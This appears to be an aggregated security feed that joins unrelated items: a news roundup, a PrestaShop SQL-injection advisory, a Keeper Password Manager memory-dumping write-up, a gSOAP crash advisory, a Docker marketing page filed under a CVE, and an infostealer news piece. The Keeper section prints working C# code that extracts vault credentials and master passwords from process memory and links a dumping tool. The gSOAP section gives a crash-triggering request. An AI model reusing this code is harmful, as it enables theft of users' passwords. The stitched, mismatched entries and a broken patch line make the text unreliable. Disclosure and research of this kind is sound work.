Plus: ICE accidentally doxes asylum seekers, Google fails to uphold a post-Roe promise, and LastPass suffers the second breach this year.

It was another busy week in security that saw big news about protests, surveillance, spyware, data breaches, and more. In the US, recent court filings detail how the FBI’s use of a controversial warrant yielded a trove of Google’s location data from thousands of devices in and around the Capitol on January 6. Meanwhile, in Iran, videos of antigovernment protests shared on social media highlight the importance of Twitter’s role in documenting human rights abuses and the consequences if the social media platform breaks.

On November 30, Google’s Threat Analysis Group moved to block a Spanish hacking framework that targets desktop computers. The exploitation framework, dubbed Heliconia, came to Google’s attention after a series of anonymous submissions to the Chrome bug reporting program. While Google, Microsoft, and Mozilla have all patched the Heliconia vulnerabilities, it’s a good reminder to keep your devices updated. ​​Here’s what you need to know about all the important security updates released in the past month.

Google researchers also found this week that the encryption keys phone-makers use to verify software on their devices are genuine—including the Android operating system itself—were stolen and used in malware.

Finally, we published part six of WIRED reporter Andy Greenberg’s series, “The Hunt for the Dark Web’s Biggest Kingpin,” which chronicles the downfall of AlphaBay, the world’s largest dark-web marketplace. Read the final installment here, and check out the full book from which the series was excerpted, _Tracers in the Dark: The Global Hunt for the Crime Lords of Cryptocurrency_, available now from wherever you buy books.

And there’s more. Each week, we highlight the news we didn’t cover in-depth ourselves. Click on the headlines below to read the full stories. 

A deadly fire in an apartment building sparked massive demonstrations in China where thousands of protestors in major cities have taken to the streets in defiance of the nation’s zero-Covid policy. The current wave of protests—the scale of which has not been seen in the country since the deadly 1989 Tiananmen Square protests—has been met with the massive surveillance and censorship apparatus that the state has been refining for decades. Authorities are using facial recognition, phone searches, and informants to identify, intimidate, and detain those who attended protests. 

The protests are stress-testing China’s sophisticated censorship apparatus, and experts say that the sheer volume of video clips has likely overwhelmed China’s armies of censors. Leaked documents from China’s Cyberspace Administration called the protests a “Level I Internet Emergency Response,” and authorities ordered ecommerce platforms to limit the availability of VPNs and firewall-circumventing routers. On Sunday, Chinese-language Twitter accounts spammed the service with links to escort services alongside city names where protests were occurring to drown out information about the protests. 

US Immigration and Customs Enforcement is in hot water after the agency mistakenly posted confidential data about thousands of asylum seekers during a routine update to their website. The data—which included the names, birthdates, nationalities, and detention locations of more than 6,000 individuals—was public for five hours before being taken down by the agency. The data disclosure could expose the immigrants affected by the breach to retaliation from the gangs and governments they had fled. 

The agency’s tech negligence comes as the Biden administration is dramatically expanding the use of technology to monitor immigrants during conditional release through smartphone apps and ankle monitors.

“The US government has an obligation to hold asylum seekers’ names and information in confidence so they don’t face retaliation,” a lawyer at Human Rights First, the organization that discovered the leak, told the _Los Angeles Times_. “ICE’s publication of confidential data is illegal and ethically unconscionable, a mistake that must never be repeated.”

New research shows that Google continues to retain sensitive location data from individuals seeking abortions in spite of promises the company made in July to purge this kind of data from its systems. Researchers with Accountable Tech, an advocacy group, conducted various experiments to analyze the data that Google stores about individuals looking for abortions online. They found that searches for directions to abortion clinics on Google Maps, as well as the routes taken to visit Planned Parenthood locations, were stored by Google for weeks. Google spokesperson Winnie King told the _Guardian_ that users “can turn Web & App Activity off at any time, delete all or part of their data manually, or choose to automatically delete the data on a rolling basis.”

Their findings contradict the pledges Google made after the US Supreme Court overturned _Roe v Wade_. “If our systems identify that someone has visited one of these places, we will delete these entries from Location History soon after they visit,” the company said in July. Five months later, Google appears to have not implemented this change.

LastPass, a popular password manager, is investigating a security incident after its systems were compromised for the second time this year. In a blog post about the incident, chief executive Karim Toubba said that an attacker gained access to their customers’ information using data stolen from LastPass’ systems in August, but did not specify what specific customer information was taken—although he stipulated that users’ stored passwords remained protected by the company’s encryption scheme. “We are working to understand the scope of the incident and identify what specific information has been accessed,” Toubba says. “In the meantime, we can confirm that LastPass products and services remain fully functional.”

China’s Police State Targets Zero-Covid Protesters

SQL njection vulnerability in SunnyToo sturls before version 1.1.13, allows attackers to escalate privileges and obtain sensitive information via StUrls::hookActionDispatcher and StUrls::getInstanceId methods.

**IMPORTANT NOTICE**: DO NOT REPORT VULNERABILITIES SOLELY TO THE AUTHOR OR MARKETPLACE.

We urge you to report any vulnerabilities directly to us. Our mission is to ensure the safety and security of the PrestaShop ecosystem. Unfortunately, many module developers may not always recognize or acknowledge the vulnerabilities in their code, whether due to lack of awareness, or inability to properly evaluate the associated risk, or other reasons.

Given the rise in professional cybercrime networks actively seeking out these vulnerabilities, it's crucial that any potential threats are promptly addressed and the community is informed. The most effective method to do this is by publishing a CVE, like the one provided below.

Should you discover any vulnerabilities, **please report them to us at: report\[@\]security-presta.org** or visit https://security-presta.org for more information.

Every vulnerability report helps make the community more secure, and we are profoundly grateful for any information shared with us.

In the module “Urls” (sturls) up to version 1.1.13 from SunnyToo for PrestaShop, a guest can perform SQL injection in affected versions.

**Summary**

*   **CVE ID**: CVE-2023-46348
*   **Published at**: 2023-12-07
*   **Platform**: PrestaShop
*   **Product**: sturls
*   **Impacted release**: <= 1.1.11 (1.1.13 fixed the vulnerability - WARNING : see WARNING below)
*   **Product author**: SunnyToo
*   **Weakness**: CWE-89
*   **Severity**: critical (9.8)

**Description**

Methods StUrls::hookActionDispatcher and StUrls::getInstanceId have sensitive SQL calls that can be executed with a trivial http call and exploited to forge a SQL injection.

This exploit uses a hook Dispatcher with forged parameters so you will never know within your conventional frontend logs that it exploits this vulnerability. **You will only see “POST /” inside your conventional frontend logs.** Activating the AuditEngine of mod\_security (or similar) is the only way to get data to confirm this exploit.

WARNING : Since we noticed this vulnerability on a 1.1.13 version but the author confirm us that it only affects 1.1.11, be warned that there is maybe manufactured versions in the wild and you should check all version prior to 1.1.13.

**CVSS base metrics**

*   **Attack vector**: network
*   **Attack complexity**: low
*   **Privilege required**: none
*   **User interaction**: none
*   **Scope**: unchanged
*   **Confidentiality**: high
*   **Integrity**: high
*   **Availability**: high

**Vector string**: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

**Possible malicious usage**

*   Obtain admin access
*   Remove data from the associated PrestaShop
*   Copy/paste data from sensitive tables to FRONT to expose tokens and unlock admins’s ajax scripts
*   Rewrite SMTP settings to hijack emails

**Patch from 1.1.13**

    --- 1.1.13/modules/sturls/sturls.php
    +++ XXXXXX/modules/sturls/sturls.php
    @@ -1288,7 +1288,7 @@ class StUrls extends Module
                             FROM '._DB_PREFIX_.'category_lang l
                             LEFT JOIN '._DB_PREFIX_.'category a
                             ON (a.id_category=l.id_category)
    -                        WHERE `link_rewrite` = "'.$top_parent_name.'"
    +                        WHERE `link_rewrite` = "'.pSQL($top_parent_name).'"
                             AND a.`active` = 1
                             AND `id_lang` = '.(int)$this->context->language->id
                         );
    @@ -1297,7 +1297,7 @@ class StUrls extends Module
                         FROM '._DB_PREFIX_.'category_lang l
                         LEFT JOIN '._DB_PREFIX_.'category a
                         ON (a.id_category=l.id_category)
    -                    WHERE `link_rewrite` = "'.$parent_name.'"
    +                    WHERE `link_rewrite` = "'.pSQL($parent_name).'"
                         AND a.`active` = 1'.
                         ($top_parent_name ? ' AND `id_parent` = ' . (int)$top_parent_id : '').'
                         AND `id_lang` = '.(int)$this->context->language->id
    @@ -1344,11 +1344,11 @@ class StUrls extends Module
                     ON (a.id_'.$table.'=l.id_'.$table.')
                     '.($table != 'category' ? 'INNER JOIN '._DB_PREFIX_.$table.'_shop s
                     ON (a.id_'.$table.'=s.id_'.$table.' AND s.id_shop = '.(int)$this->context->shop->id.')' : '').'
    -                WHERE `'.$field.'` = "'.$rewrite.'"
    +                WHERE `'.bqSQL($field).'` = "'.pSQL($rewrite).'"
                     AND `id_lang` = '.(int)$this->context->language->id.'
                     '.($is_id_shop ? 'AND l.id_shop='.(int)$this->context->shop->id : '').'
    -                '.($has_ref ? 'AND reference="'.$reference.'"' : '').'
    -                '.($id_parent ? 'AND id_parent IN ('.implode(',',$id_parent).')' : '').'
    +                '.($has_ref ? 'AND reference="'.pSQL($reference).'"' : '').'
    +                '.($id_parent ? 'AND id_parent IN ('.implode(',', array_map('intval', $id_parent)).')' : '').'
                     ');
                 if ($id) {
                     Configuration::updateValue($this->_prefix_st.'sha1_'.$sig, (int)$id);
    @@ -1513,7 +1513,7 @@ class StUrls extends Module
                             SELECT bl.id_st_blog FROM '._DB_PREFIX_.'st_blog_lang bl
                             INNER JOIN '._DB_PREFIX_.'st_blog_shop bs
                             ON(bl.`id_st_blog` = bs.`id_st_blog`)
    -                        WHERE link_rewrite = "'.$rewrite.'"
    +                        WHERE link_rewrite = "'.pSQL($rewrite).'"
                             AND id_lang = '.(int)Context::getContext()->language->id.'
                             AND id_shop = '.(int)$this->context->shop->id.'
                             ');
    @@ -1536,7 +1536,7 @@ class StUrls extends Module
                             SELECT l.id_st_blog_category FROM '._DB_PREFIX_.'st_blog_category_lang l
                             INNER JOIN '._DB_PREFIX_.'st_blog_category_shop s
                             ON(l.`id_st_blog_category` = s.`id_st_blog_category`)
    -                        WHERE link_rewrite = "'.$rewrite.'"
    +                        WHERE link_rewrite = "'.$pSQL($rewrite).'"
                             AND id_lang = '.(int)Context::getContext()->language->id.'
                             AND id_shop = '.(int)$this->context->shop->id.'
                             ');
    

**Other recommendations**

*   It’s recommended to upgrade to the latest version of the module **sturls**.
*   Upgrade PrestaShop to the latest version to disable multiquery executions (separated by “;”) - be warned that this functionality **WILL NOT** protect your SHOP against injection SQL which uses the UNION clause to steal data.
*   Change the default database prefix ps_ with a new longer, arbitrary prefix. Nevertheless, be warned that this is useless against blackhats with DBA senior skills because of a design vulnerability in DBMS
*   Activate OWASP 942’s rules on your WAF (Web application firewall), be warned that you will probably break your backoffice and you will need to pre-configure some bypasses against this set of rules.

**Timeline**

Date

Action

2023-08-31

Issue discovered during a code review by TouchWeb.fr

2023-08-31

Contact Author to confirm versions scope

2023-09-09

Author confirm versions scope

2023-09-16

Author provide a patch

2023-10-17

Request a CVE ID

2023-10-23

Received CVE ID

2023-12-07

Publish this security advisory

**Links**

*   Author product page
*   National Vulnerability Database

**DISCLAIMER:** _The French Association Friends Of Presta (FOP) acts as an intermediary to help hosting this advisory. While we strive to ensure the information and advice provided are accurate, FOP cannot be held liable for any consequences arising from reported vulnerabilities or any subsequent actions taken._

CVE-2023-46348: [CVE-2023-46348] Improper neutralization of SQL parameter in SunnyToo - Urls module for PrestaShop

An issue was discovered in Keeper Password Manager for Desktop version 16.10.2, and the KeeperFill Browser Extensions version 16.5.4, allows local attackers to gain sensitive information via plaintext password storage in memory after the user is already logged in, and may persist after logout.

**It's Not What You Think - It's Worse**

There are a number of password management solutions available to the public. While some have naturally been deprecated due to security concerns or improvements in cryptographic handling. The noteworthy part is that they usually don’t just hand over plain text passwords when asked.

With that piece of foreshadowing, the target for today’s post is a solution quickly growing in popularity even amongst enterprise users: **Keeper Password Manager**

**To Keep or Not To Keep**

To begin I start by installing Keeper Password Manager, creating an account, and creating some fake credential entries. By now I of course notice that the Desktop App was effectively Electron, or a Chromium Embedded Framework (CEF) application.

Now, the lowest hanging fruit thing I can think to attempt. Attach WinDebug to Keeper and use it to search memory for password strings or structures that could map where they are stored. Attempting to search for the credentials in memory very graciously gives them to us in plain text - oh joy.

Now I have an idea of how they are being stored in memory though and the JSON layout. This will prove useful in searching for others, so I used the start of the JSON to search for other entries. There were many - with each having two memory locations.

Now I begin looking for patterns that could help me figure out the mapping or locations these are written to, anything that could act as the equivalent to a V8 string mapping table.

After some searching and comparing a pattern begins to emerge. All the addresses have pointers for them stored at: 0x??fff0020 -> 0x??fff0030

Through further searching I did find that this could vary with the most reliable range being 0x??fff0010 -> 0x??fff1ff0 as the increments of 0x10 each appeared to store a pointer to a different string or value - including the JSON password strings.

**What A Dump ...**

There is a fundamental issue with our the above means of attempting to parse and extract passwords, and that is the JavaScript engine V8. The way in which this engine allocates memory and how it can vary kills any chances we have of relying on this for credential dumping. So upon restarting the target Keeper password manager vault, the pointer locations can vary wildly.

Fortunately, Enoch Wang, Samuel Zurowski, and Tyler Thomas published some research into V8 Memory mapping called Juicing V8 . So thanks to the University of New Haven for the helpful work and resources. Unfortunately, it didn’t help in this case - wether this is the result of Electron or V8 versioning or error on my part I am not sure.

According, to their work and corresponding Volatility Plugin: V8 operates by crating a MetaMap which stores a pointer reference to itself +0x1, this pointer is also present in the Object maps and the pointers for these Object maps are then once again stored in the Object Structures where strings and other data can be found and extracted.

So in theory, one could iterate over memory to find a specific byte pattern, always present at +0x10 bytes after the start of the MetaMap: ff 03 (40 | 20) 00 - at least according to the volatility plugin and the Juicing V8 research work. Sadly this byte pattern is seemingly unreliable and produces inaccurate results in the case of Keeper but it is something that could be built upon in future.

So, with no ‘refined’ means of mapping and parsing the target application’s memory I turned to the biggest hammer I could find for this metaphorical nail: **_RegEx_**

**Witty Expression Cirqa 1951**

To begin I started by constructing the necessary CSharp code.

        public static List<string> stringsList = new List<string>();
        static void Main(string[] args)
        {
            // Iterate over each process id
            foreach (var process in Process.GetProcessesByName("keeperpasswordmanager"))
            {
                // Get process command line string
                string commandline = GetCommandLine(process);
                // Check if it matches known child process client id that stores credentials
                if (commandline.Contains("--renderer-client-id=5") || commandline.Contains("--renderer-client-id=7"))
                {
                    Console.WriteLine("->Keeper Target PID Found: {0}", process.Id.ToString());
                    Console.WriteLine("->Searching...\n");
                    // Get process handle, VM READ and QUERY
                    IntPtr processHandle = OpenProcess(0x00000400 | 0x00000010, false, process.Id);
                    // Start address
                    IntPtr address = new IntPtr(0x10000000000);
                    MEMORY_BASIC_INFORMATION memInfo = new MEMORY_BASIC_INFORMATION();
                    // Iterate over memory regions
                    while (VirtualQueryEx(processHandle, address, out memInfo, (uint)Marshal.SizeOf(memInfo)) != 0)
                    {
                        // Check if memory committed & Type is private
                        if (memInfo.State == 0x00001000 && memInfo.Type == 0x20000)
                        {
                            byte[] buffer = new byte[(int)memInfo.RegionSize];
                            // Read region into buffer the size of memory region.
                            if (NtReadVirtualMemory(processHandle, memInfo.BaseAddress, buffer, (uint)memInfo.RegionSize, IntPtr.Zero) == 0x0)
                            {
                                string text = Encoding.ASCII.GetString(buffer);
                                extract_credentials(text);
                                extract_master(text);
                                extract_account(text);
                            }
                        }
                        // Increment to next region
                        address = new IntPtr(memInfo.BaseAddress.ToInt64() + memInfo.RegionSize.ToInt64());
                    }
                    // Close process handle when finished
                    CloseHandle(processHandle);
                }
            }
        }
    

I did spot that **Keeper** almost always starts the password containing child process with --renderer-client-id=5.

This can alter if the target child process crashes and the parent does not terminate, so felt it best to include a check for 7 as well:

        public static string GetCommandLine(this Process process)
        {
            if (process is null || process.Id < 1)
            {
                return "";
            }
            // Construct LINQ query to get process command line
            string query = $@"SELECT CommandLine FROM Win32_Process WHERE ProcessId = {process.Id}";
    
            // Create Object Searcher and get then return command line
            using (var searcher = new ManagementObjectSearcher(query))
            using (var collection = searcher.Get())
            {
                var managementObject = collection.OfType<ManagementObject>().FirstOrDefault();
                return managementObject != null ? (string)managementObject["CommandLine"] : "";
            }
        }
    

Moving onto the next step, we need to be able to make all our needed Win32 API calls. To accomodate this I created the necessary DLL Imports.

Also, no I did not go the extra mile and make use of D/Invoke or Syscalls, I have some love for my free time.

We can now make a call to get a handle to the target process with both virtual Memory read and query information permissions. Using this handle we can perform the needed operations to extract potential credential data.

        [DllImport("kernel32.dll")]
        public static extern IntPtr OpenProcess(uint dwDesiredAccess, [MarshalAs(UnmanagedType.Bool)] bool bInheritHandle, int dwProcessId);
    
        [DllImport("kernel32.dll")]
        public static extern bool CloseHandle(IntPtr hObject);
    
        [DllImport("ntdll.dll")]
        public static extern uint NtReadVirtualMemory(IntPtr ProcessHandle, IntPtr BaseAddress, byte[] Buffer, UInt32 NumberOfBytesToRead, IntPtr NumberOfBytesRead);
    
        [DllImport("kernel32.dll", SetLastError = true)]
        public static extern int VirtualQueryEx(IntPtr hProcess, IntPtr lpAddress, out MEMORY_BASIC_INFORMATION lpBuffer, uint dwLength);
    
        [StructLayout(LayoutKind.Sequential)]
        public struct MEMORY_BASIC_INFORMATION
        {
            public IntPtr BaseAddress;
            public IntPtr AllocationBase;
            public uint AllocationProtect;
            public IntPtr RegionSize;
            public uint State;
            public uint Protect;
            public uint Type;
        }
    

Now finally to incorporate the code to handle extracting the records. Under more surgical conditions we could attempt to precisely determine the length. If we look around near the stored password JSON string we can quickly identify a useful set of bytes. Exactly 8 bytes prior to the password JSON is four bytes that are almost always seemingly 0x00000180 | 384.

If we however create an entry in Keeper that exceeds this length we see it changes to 0x00000400 | 1024

If we compare the base address with this length - 0x1 we can see we perfectly match the padding that surrounds the end of the JSON string object which is always padded with 0x20’s.

However, as discussed before, surgical precision and the V8 MetaMap structures were not reliable during my analysis. So with this in mind we can simply rely on RegEx to grab the appropriate JSON structure. I would like to apologise in advance for the messiest set of Regular Expressions to grace the internet.

        public static void extract_credentials(string text)
        {
            // Index for start of target JSON string
            int index = text.IndexOf("{\"title\":\"");
            // Index for end of JSON string
            int eindex = text.IndexOf("}");
            while (index >= 0)
            {
                try
                {
                    int endIndex = Math.Min(index + eindex, text.Length);
                    // Create regex statement to match JSON structure
                    Regex reg = new Regex("(\\{\\\"title\\\"[ -~]+\\}(?=\\s))");
                    // Use regex to match and convert the match to a string
                    string match = reg.Match(text.Substring(index - 1, endIndex - index)).ToString();
    
                    // Get index of end of the regex match (for cleaning)
                    int match_cut = match.IndexOf("}  ");
                    // if matched
                    if (match_cut != -1 )
                    {
                        // Cut and trim the match to remove duplicates and empty spaces
                        match = match.Substring(0, match_cut + "}  ".Length).TrimEnd();
                        // Compare to string list to check if already extracted
                        if (!stringsList.Contains(match) && match.Length > 20)
                        {
                            Console.WriteLine("->Credential Record Found : " + match.Substring(0, match_cut + "}  ".Length) + "\n");
                            stringsList.Add(match);
                        }
    
                    } else if (!stringsList.Contains(match.TrimEnd()) && match.Length > 20)
                    {
                        Console.WriteLine("->Credential Record Found : " + match + "\n");
                        stringsList.Add(match.TrimEnd());
                    }
                    index = text.IndexOf("{\"title\":\"", index + 1);
                    eindex = text.IndexOf("}", eindex + 1);
                }
                catch
                {
                    return;
                }
    
            }
        }
    

However, there are crucial bits of data missing here. Keeper stores far more of value in memory than just the vault records. One can find the user account email address in memory using the below.

        public static void extract_account(string text)
        {
            int index = text.IndexOf("{\"expiry\"");
            int eindex = text.IndexOf("}");
            while (index >= 0)
            {
                try
                {
                    int endIndex = Math.Min(index + eindex, text.Length);
                    Regex reg = new Regex("(\\{\\\"expiry\\\"[ -~]+@[ -~]+(?=\\}).)");
                    string match = reg.Match(text.Substring(index - 1, endIndex - index)).ToString();
                    if ((match.Length > 2))
                    {
                        Console.WriteLine("->Account Record Found : " + match + "\n");
                        return;
                    }
                    index = text.IndexOf("{\"expiry\"", index + 1);
                    eindex = text.IndexOf("}", eindex + 1);
                }
                catch
                {
                    return;
                }
            }
    
        }
    

Also, while the idea of a master password is great - it is conveniently stored in memory in plain text right next to a recognizable data_key identifier for easy retrieval.

 

An exception to this is SSO logins which instead appear to store a JSON Web Token, in a separate JSON object. Not that anyone has an interest in that, **_wink wink_**.

So I shall apply checks for the master password too, by looking for the data\_key key word and filtering out known useless result patterns.

        public static void extract_master(string text)
        {
            int index = text.IndexOf("data_key");
            int eindex = index + 64;
            while (index >= 0)
            {
                try
                {
                    int endIndex = Math.Min(index + eindex, text.Length);
                    Regex reg = new Regex("(data_key[ -~]+)");
                    var match_one = reg.Match(text.Substring(index - 1, endIndex - index)).ToString();
                    Regex clean = new Regex("(_[a-zA-z]{1,14}_[a-zA-Z]{1,10})");
                    if (match_one.Replace("data_key", "").Length > 5)
                    {
                        if (!clean.IsMatch(match_one.Replace("data_key", "")))
                        {
                            Console.WriteLine("->Master Password : " + match_one.Replace("data_key", "") + "\n");
                        }
    
                    }
                    index = text.IndexOf("data_key", index + 1);
                    eindex = index + 64;
                }
                catch
                {
                    return;
                }
    
            }
        }
    

**Burn The Dump**

After debugging and testing my code I have now reached a stable point where it consistently dumps all stored credentials across hosts and installs.

From here it is worth asking, what happens when it signs the user out or if a user deletes a record? Well fear not, it does nothing. Unless you are using an enterprise or SSO sign-in, memory clearing will not be configured by default.

So long as the application and its child processes haven’t been entirely restarted then they are kept nicely in memory. This even applies to if your session ‘times out’, so long as the memory clearing setting hasn’t been manually enabled by the user.

Well surely the browser extension doesn’t suffer from this issue and manages the storage of clear text credentials carefully with clearing of memory and on-demand credential retrieval? No, it really doesn’t. The below is a live MSEDGE browser child process memory which has all the credentials stored in plain text.

For any of those wondering if this is of concern to Keeper please see the attached out-of-scope vulnerability disclosure bullet point.

*   **Bugs that rely on keylogging, compromise of the operating system or privileged access**

Never the less, MITRE has reserved the above issues under **CVE-2023-36266**.

So, in conclusion I can highly recommend Keeper Security and their secure password storage solutions. If you would like to make full use of Keeper’s broad feature set feel free to download my tool from here: **Peeper Password Dumper**

While my tool doesn’t parse and retrieve credentials from browsers, I am sure some smart people out there will have that working soon. Thanks for reading.

CVE-2023-36266: Keeper Security - Dumping Cleartext Passwords

Cross-Site Request Forgery (CSRF) vulnerability in WordPlus Better Messages plugin <= 1.9.9.148 at WordPress allows attackers to upload files. File attachment to messages must be activated.

CVE-2022-29454: Better Messages – Live Chat for WordPress, BuddyPress, BuddyBoss, Ultimate Member, PeepSo

A denial-of-service vulnerability exists in the WS-Addressing plugin functionality of Genivia gSOAP 2.8.107. A specially crafted SOAP request can lead to denial of service. An attacker can send an HTTP request to trigger this vulnerability.

**Summary**

A denial-of-service vulnerability exists in the WS-Addressing plugin functionality of Genivia gSOAP 2.8.107. A specially crafted SOAP request can lead to denial of service. An attacker can send an HTTP request to trigger this vulnerability.

**Tested Versions**

Genivia gSOAP 2.8.107

**Product URLs**

https://www.genivia.com/products.html#gsoap

**CVSSv3 Score**

7.5 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

**CWE**

CWE-476 - NULL Pointer Dereference

**Details**

The gSOAP toolkit is a C/C++ library for developing XML-based web services. It includes several plugins to support the implementation of SOAP and web service standards. The framework also provides multiple deployment options including modules for both IIS and Apache, standalone CGI scripts and its own standalone HTTP service.

One of the many plugins provided by gSOAP includes the wsa plugin for supporting the WS-Addressing specification which provides an asynchronous mechanism for routing SOAP requests and responses. The specification includes a element to allow the request to specify a fault endpoint. A denial of service condition can occur if a request includes a FaultTo element but doesn't include an Address element as well.

A normal request

      <wsa5:FaultTo SOAP-ENV:mustUnderstand="1">
       <wsa5:Address></wsa5:Address> <---
       <wsa5:ReferenceParameters>
        <chan:ChannelInstance>0</chan:ChannelInstance>
       </wsa5:ReferenceParameters>
       <wsa5:Metadata>
       </wsa5:Metadata>
      </wsa5:FaultTo>
    

A malicious request

      <wsa5:FaultTo SOAP-ENV:mustUnderstand="1">
       <wsa5:ReferenceParameters>
        <chan:ChannelInstance>0</chan:ChannelInstance>
       </wsa5:ReferenceParameters>
       <wsa5:Metadata>
       </wsa5:Metadata>
      </wsa5:FaultTo>
    

FaultTo->Address is set but never checked to be valid.

    1055     if (oldheader->SOAP_WSA(FaultTo))
    1056       oldheader->SOAP_WSA(FaultTo)->Address = oldheader->SOAP_WSA(ReplyTo)->Address;
    1057   }
    

No check of oldheader->SOAP\_WSA(FaultTo)->Address is ever made before being used.

    1058   /* use FaultTo */
    1059   if (oldheader && oldheader->SOAP_WSA(FaultTo) &&** !strcmp(oldheader->SOAP_WSA(FaultTo)->Address, soap_wsa_noneURI)) **
    1060     return soap_send_empty_response(soap, SOAP_OK);     /* HTTP ACCEPTED */
    1061   soap->header = NULL;
    

**Crash Information**

    (gdb) r 8080
    Starting program: /gsoap-2.8-wsa/gsoap/samples/wsa/wsademo 8080
    [Thread debugging using libthread_db enabled]
    Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
    Server is running
    
    Program received signal SIGSEGV, Segmentation fault.
    __strcmp_ssse3 () at ../sysdeps/x86_64/multiarch/../strcmp.S:173
    173	../sysdeps/x86_64/multiarch/../strcmp.S: No such file or directory.
    (gdb) bt
    #0  __strcmp_ssse3 () at ../sysdeps/x86_64/multiarch/../strcmp.S:173
    #1  0x000055555556637a in soap_wsa_fault_subcode_action (soap=0x7ffff7fbe010, flag=1, faultsubcode=0x5555555a9739 "wsa5:ActionNotSupported",
        faultstring=0x5555555a9c80 "The [action] cannot be processed at the receiver.", faultdetail=0x0, action=0x0) at ../../plugin/wsaapi.c:1060
    #2  0x0000555555566257 in soap_wsa_fault_subcode (soap=0x7ffff7fbe010, flag=1, faultsubcode=0x5555555a9739 "wsa5:ActionNotSupported",
        faultstring=0x5555555a9c80 "The [action] cannot be processed at the receiver.", faultdetail=0x0) at ../../plugin/wsaapi.c:1022
    #3  0x00005555555666b1 in soap_wsa_sender_fault_subcode (soap=0x7ffff7fbe010, faultsubcode=0x5555555a9739 "wsa5:ActionNotSupported",
        faultstring=0x5555555a9c80 "The [action] cannot be processed at the receiver.", faultdetail=0x0) at ../../plugin/wsaapi.c:1128
    #4  0x0000555555566d5d in soap_wsa_error (soap=0x7ffff7fbe010, fault=wsa5__ActionNotSupported, info=0x0) at ../../plugin/wsaapi.c:1430
    #5  0x000055555556709e in soap_wsa_set_error (soap=0x7ffff7fbe010, c=0x5555557bdbc0, s=0x5555557bdbc8) at ../../plugin/wsaapi.c:1625
    #6  0x00005555555a61f4 in soap_set_fault (soap=0x7ffff7fbe010) at stdsoap2_ssl.c:22059
    #7  0x00005555555a6f2a in soap_send_fault (soap=0x7ffff7fbe010) at stdsoap2_ssl.c:22322
    #8  0x00005555555650cf in soap_serve (soap=0x7ffff7fbe010) at soapServer.c:42
    #9  0x0000555555558d44 in main (argc=2, argv=0x7fffffffe4c8) at wsademo.c:85
    

**Timeline**

2020-11-05 - Vendor Disclosure  
2020-12-16 - Vendor advised patch released on 2020-11-20  
2021-01-05 - Public Release

Discovered by a member of Cisco Talos.

CVE-2020-13575: TALOS-2020-1186 || Cisco Talos Intelligence Group

Docker version 20.10.15, build fd82621 is vulnerable to Insecure Permissions. Unauthorized users outside the Docker container can access any files within the Docker container.

****Develop faster.** Run anywhere.**

The most-loved Tool in Stack Overflow’s 2022 Developer Survey.

 

Wasm is a new, fast, and light alternative to the Linux/Windows containers you’re using in Docker today — give it a try with the Docker+Wasm Beta.

Try it

**Accelerate how you build, share, and run modern applications.**

13 billion +  
monthly image downloads

**Docker makes development efficient and predictable**

Docker takes away repetitive, mundane configuration tasks and is used throughout the development lifecycle for fast, easy and portable application development – desktop and cloud. Docker’s comprehensive end to end platform includes UIs, CLIs, APIs and security that are engineered to work together across the entire application delivery lifecycle.

**Build**

*   Get a head start on your coding by leveraging Docker images to efficiently develop your own unique applications on Windows and Mac.  Create your multi-container application using Docker Compose.
*   Integrate with your favorite tools throughout your development pipeline – Docker works with all development tools you use including VS Code, CircleCI and GitHub.
*   Package applications as portable container images to run in any environment consistently from on-premises Kubernetes to AWS ECS, Azure ACI, Google GKE and more.

 

 

**Share**

*   Leverage Docker Trusted Content, including Docker Official Images and images from Docker Verified Publishers from the Docker Hub repository.
*   Innovate by collaborating with team members and other developers and by easily publishing images to Docker Hub.
*   Personalize developer access to images with roles based access control and get insights into activity history with Docker Hub Audit Logs.

**Run**

*   Deliver multiple applications hassle free and have them run the same way on all your environments including design, testing, staging and production – desktop or cloud-native.
*   Deploy your applications in separate containers independently and in different languages. Reduce the risk of conflict between languages, libraries or frameworks.
*   Speed development with the simplicity of Docker Compose CLI and with one command, launch your applications locally and on the cloud with AWS ECS and Azure ACI.

 

**New to containers?**

Today, all major cloud providers and leading open source serverless frameworks use our platform, and many are leveraging Docker for their container-native IaaS offerings.

**A Community like No Other**

Community is at the heart of what Docker does. From our Docker Captains sharing their insight and expertise, to hundreds of MeetUps around the world, to our Slack and Discourse forums for peer-to-peer support, there’s someone else out there who has been there, done that, and is eager to help.

**Use your favorite tools and images**

**Choose a subscription that is right for you**

Benefit from more collaboration, increased security, without limits… all enabled with a Docker subscription.

Check out our pricing.

**See who uses Docker**

**Go from code to cloud securely with partners that you trust**

Trust that your development pipeline workflow will work in any environment – locally and in the cloud.

 

Simplify the development of your multi-container applications from Docker CLI to Amazon ECS on AWS Fargate. 

Learn more

 

Seamlessly bring container applications from your local machine and run them in Azure container Instances.  

Learn more

 

Secure your containerized applications with vulnerability scanning and leverage trusted, certified images locally and in the cloud.

Learn more

 

Easily distribute and share Docker images with the JFrog Artifactory image repository and integrate all of your development tools.

Learn more

**Accelerate your application development today.**

CVE-2022-37708: Docker: Accelerated, Containerized Application Development

By Deeba Ahmed
Skuld malware, named after the Norse goddess associated with the future and fate employs sophisticated techniques to infiltrate…
This is a post from HackRead.com Read the original post: Windows Users Alert: Skuld Malware Steals Discord and Browser Data

Skuld malware, named after the Norse goddess associated with the future and fate employs sophisticated techniques to infiltrate Windows systems and gain unauthorized access to sensitive information.

Cybersecurity researchers have noticed an uptick in the use of the Go programming language by threat actors in developing malware. Skuld infostealer is the latest iteration discovered by Trellix, which substantiates this fact.

According to a report by Ernesto Fernández Provecho from Trellix Advanced Research Center, a new infostealing malware, dubbed Skuld, is targeting Windows-based systems worldwide. It is capable of stealing sensitive data from web browsers and Discord accounts.

****Skuld Malware Analysis****

Right after execution, Skuld looks for data from Discord accounts or web browsers, mainly searching files stored in folders. It especially locates financial data because some samples Trellix examined included an evolving module capable of stealing cryptocurrency wallets’ data.

Furthermore, Skuld checks whether it is running in a virtual setup through three different techniques.

*   First- check for the system’s screen resolution. If it isn’t higher than 200×200 pixels, it assumes the system is running in a virtual environment.
*   Second- It checks for the total RAM, which should be over 2,000,000,000 bytes/1.86 GB.
*   Third- It checks the various registry keys linked with the system’s video and disk information, and if any of them contain information about Virtual Box or VMware, the application terminates.

If a Windows device is confirmed, it extracts several running processes to be compared against a pre-defined blocklist for matching. The list comprises Username, PC name, HWID, and Public IP address.

